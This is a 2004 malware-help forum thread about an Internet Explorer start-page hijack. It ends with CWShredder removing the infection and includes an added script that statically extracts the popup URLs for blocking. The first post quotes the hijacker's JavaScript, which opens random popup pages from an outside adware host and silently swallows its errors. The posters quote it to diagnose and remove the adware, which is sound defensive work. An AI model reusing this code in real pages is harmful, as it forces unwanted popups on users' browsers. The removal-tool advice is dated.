Search for...

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by acacia957jn, Jul 12, 2004.

  1. acacia957jn

    acacia957jn Private E-2

    Hi, I need your expert opinion and help in the problem that I am having.
    Here is the scenario.
    (1) Double click on IE
    (2) Search For... page loads despite that I have "blank" page setup.
    No URL's. I think it's an html file downloaded onto my machine.
    (3) A second or two later. I get a popup window.
    No URL's. Again, it's inside my PC.

    I saved the Search For page and discovered that there's an index file that gets triggered. Here is how it goes.
    try{
      function random(num){return Math.floor(Math.random()*num)}
      var ap=new Array("popup2.php","popup3.php","popup5.php","popup6.php","popup7.php","popup14.php");
      var u="http://4bf65.ilxt.info/"+ap[random(ap.length)];
      var center_x = screen.width/2-400/2;
      var center_y = screen.height/2-300/2;
      for(i=0;i<document.all.length;i++) {
        if(document.all.tagName=='SCRIPT'&& (idx=document.all.src.indexOf('?pin='))>0) {
          u+=document.all.src.substr(idx);
        }
      }
      open(u, "_blank", "channelmode=0,directories=0,fullscreen=no,location=0,menubar=0,scrollbars=0,status=0,titlebar=0,toolbar=0,resizable=1,width=400,height=300,top="+center_y+",left="+center_x);
    }catch(e){}

    I think I started to have this problem a day or two after I upgraded my ICQ Lite software. I think this is benign adware and not causing a security breach or anything, but it's very annoying. Please help me get rid of this thing.

    Thanks, JN
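
The script quoted in the post above can be triaged without running it. The following is an added example, not part of the original post: it reads the script as text and lists the popup URLs it can build, so the host can be blocked. The function and field names are illustrative, and the sample is an abridged copy of the posted script.

```javascript
// Static triage of a saved hijack-page script: the script is only read as
// text, never executed. Function and field names are illustrative.

// Abridged copy of the script quoted in the post above.
const SAMPLE = 'try{ var ap=new Array("popup2.php","popup3.php","popup5.php",' +
  '"popup6.php","popup7.php","popup14.php"); ' +
  'var u="http://4bf65.ilxt.info/"+ap[random(ap.length)]; ' +
  'open(u, "_blank", "toolbar=0,resizable=1,width=400,height=300"); }catch(e){}';

function triagePopupScript(src) {
  // 1. Collect string arrays declared as: var NAME = new Array("a","b",...)
  const arrays = {};
  const arrayRe = /var\s+(\w+)\s*=\s*new\s+Array\(([^)]*)\)/g;
  for (const m of src.matchAll(arrayRe)) {
    arrays[m[1]] = [...m[2].matchAll(/"([^"]*)"/g)].map(s => s[1]);
  }
  // 2. Find URL variables built as: var NAME = "http(s)://base" + ARRAY[...]
  const urlVars = {};
  const urlRe = /var\s+(\w+)\s*=\s*"(https?:\/\/[^"]+)"\s*\+\s*(\w+)\s*\[/g;
  for (const m of src.matchAll(urlRe)) {
    urlVars[m[1]] = (arrays[m[3]] || []).map(p => m[2] + p);
  }
  // 3. Keep only the variables that are actually passed to open(...)
  const urls = [];
  for (const m of src.matchAll(/\bopen\(\s*(\w+)\s*,/g)) {
    urls.push(...(urlVars[m[1]] || []));
  }
  const hosts = [...new Set(urls.map(u => new URL(u).hostname))];
  return {
    urls,
    hosts,
    // An empty catch block hides every script error from the user.
    swallowsErrors: /catch\s*\(\s*\w+\s*\)\s*\{\s*\}/.test(src),
  };
}

// Hosts-file style lines that sinkhole the popup source.
function hostsFileLines(report) {
  return report.hosts.map(h => `0.0.0.0 ${h}`);
}

const report = triagePopupScript(SAMPLE);
console.log(report, hostsFileLines(report));
```

Blocking the host only stops the popup content from loading; the altered start page itself still has to be repaired with the removal tools discussed in the replies.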
     
  2. krazykrl

    krazykrl Sergeant Major

    Sounds like you need "Hijack This!"

    I would be willing to bet in your C:\WINDOWS folder there is an html file doing this, but deleting will not fix it.

    You might as well download Hijack This! as well as...

    Spybot S&D 1.3
    Ad-aware

    Good luck
     
  3. acacia957jn

    acacia957jn Private E-2

    Hi, thanks for the reply.
    I will look into downloading "HiJack This!"
    ---JN
     
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

  5. acacia957jn

    acacia957jn Private E-2

    Hi,
    CWShredder.exe worked like a charm.

    Spybot and Ad-aware took forever to scan and
    when PC was supposedly fixed, shut down the PC, and reboot like 30 seconds,
    the problem returns every time. I suppose the program manifested deep inside where these two software could not reach. The symptoms might be eradicated but the minute the machine is rebooted, the program reinserted itself. That's my observation.

    I tried HijackThis and it had some errors on my PC. I didn't quite understand what it meant. I didn't know where to look, either.

    In desperation, I re-installed all the components of Internet Explorer in the hope that it will overwrite the infected registry. Nope, whoever wrote this strain of adware anticipated component re-installation too. Darn.

    CWShredder.exe was my last hope. It was fast and very intuitive giving the live feedback while it was scanning various strains of infection and if not found, "nonexistent" and moved down the list. It found 7 incidents of altered registry and told me they were all fixed. When I restarted the machine,
    I crossed my fingers in both hands. Voilà, the infection is gone now.


    Next time, I'd go straight to CWShredder.exe.
    Thanks all for your help.
    --JN
     
  6. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    CWShredder is only for CWS variants. It does not cover the wide areas that Ad-aware and SpyBot S&D cover. While your problem this time was easily fixed with CWShredder, that may not always be the case. Don't read this as me saying CWShredder is bad. I'm not saying that. I'm just saying there are many tools that need to be in your list for working on all these problems.

    You should give us the messages you were receiving while trying to use HijackThis so we can figure out what is wrong there. You may need to use it some day.
     
